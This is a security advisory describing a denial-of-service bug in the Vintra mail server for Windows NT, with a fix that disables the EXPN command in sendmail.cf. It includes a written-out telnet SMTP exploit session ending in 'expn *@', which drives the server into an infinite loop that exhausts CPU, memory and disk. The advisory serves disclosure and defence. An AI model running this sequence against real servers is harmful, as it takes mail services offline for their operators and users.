COMMAND

    mail server from Vintra

SYSTEMS AFFECTED

    Systems running Vintra mail server

PROBLEM

    Vytis Fedaravicius  found following.   There is  a bug  in a  free
    MailServer  software  for  Windows  NT  from  Vintra systems.  Any
    remote user can  cause MTA to  go nuts and  make CPU ussage  up to
    99%, eat all available memory and disk space.

    Bug: one opens telnet to 25 port, issues helo, mail from: and rcpt
    to:  commands, and instead of data command uses expn *@. Softwarre
    goes in a infinite loop.  Exploit:

        telnet vulnerable.server.dom 25

        220 vulnerable.server.dom ESMTP Sendmail 8.8.8/8.8.7; Mon, 20 Jul 1998
        20:18:20 +0200 (Central Europe Daylight Time)

        helo EvilOne

        250 vulnerable.server.dom Hello Administrators@localhost, pleased to meet
        you

        mail from:bad.boy

        250 bad.boy... Sender ok

        rcpt to:resourceLeaker

        550 resourceLeaker... User unknown

        expn *@

        550 *@... User unknown
        550 bad.boy... User unknown
        550 bad.boy... User unknown
        ...hundreds of these lines gets logged and memory is allocated, cpu ussage
        increases wildly

        550 bad.boy... User unknown
        550 bad.boy... User unknown
        ....

SOLUTION

    Disable expn  command by  editing sendmail.cf.   Add the  folowing
    line and restart mta service:

        O PrivacyOptions=needmailhelo, noexpn